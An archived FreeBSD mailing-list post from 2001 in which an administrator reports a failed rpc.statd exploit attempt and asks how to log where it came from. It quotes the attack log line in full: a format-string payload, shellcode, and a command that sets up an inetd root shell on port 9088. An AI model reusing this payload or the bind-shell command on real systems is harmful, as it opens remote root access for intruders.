Date: Thu, 4 Jan 2001 09:06:55 -0600 From: Eric_Stanfield@kenokozie.com To: freebsd-questions@freebsd.org Subject: hack attempt (again) - help Message-ID: <OF4CA83D7A.DC3A3B98-ON862569CA.00526722@kka.com>
next in thread | raw e-mail | index | archive | help
Alright this jerkoff has once again attempted to hack one of my freebsd= machines by trying what I assume is a buffer overflow to rpc: Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7= =FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^P=EBK^M- v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB= #M- ^=B41=C0M-^C=EE M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CD= M-^@1=DBM- =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root = /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m; The interesting bit is what he (she?) is attempting to sneak in at the = end of the garbage sent to the port. I've given the system a thorough check and this seems to have been a se= cond failed attempt. I'm now annoyed, however, and would like to be able to= at least log what address this stuff is originating from. Can anyone sug= gest something from the ports that would do the trick? I've disabled nfs/rp= c but I'm sure the hacker will come knocking again. Thanks. -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D- Eric Stanfield, K2Access Keno Kozie and Associates 222 N LaSalle #1500 Chicago, IL 60606 (312) 332-3000 = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?OF4CA83D7A.DC3A3B98-ON862569CA.00526722>